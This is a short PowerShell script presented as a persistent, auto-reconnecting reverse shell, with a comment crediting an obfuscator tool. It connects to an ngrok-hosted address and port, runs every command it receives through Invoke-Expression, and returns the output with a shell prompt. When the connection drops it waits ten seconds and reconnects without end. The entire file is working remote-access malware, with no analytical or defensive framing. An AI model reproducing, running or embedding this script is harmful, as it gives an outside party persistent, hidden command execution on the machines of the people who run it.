# Persistent Reverse Shell - Auto Reconnect
# Generated by Fyxalor's PowerObfuscator
# Target: 0.tcp.in.ngrok.io:19853

while($true) {
    try {
        $client = New-Object System.Net.Sockets.TcpClient('0.tcp.in.ngrok.io', 19853)
        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}
        
        while($client.Connected) {
            $i = $stream.Read($bytes, 0, $bytes.Length)
            if($i -ne 0) {
                $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
                try {
                    $sendback = (IEX $data 2>&1 | Out-String)
                } catch {
                    $sendback = $_.Exception.Message + "`n"
                }
                $sendback2 = $sendback + "PS " + (pwd).Path + "> "
                $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
                $stream.Write($sendbyte,0,$sendbyte.Length)
                $stream.Flush()
            } else {
                break
            }
        }
        $stream.Close()
        $client.Close()
    } catch {
        Start-Sleep -Seconds 10
    }
}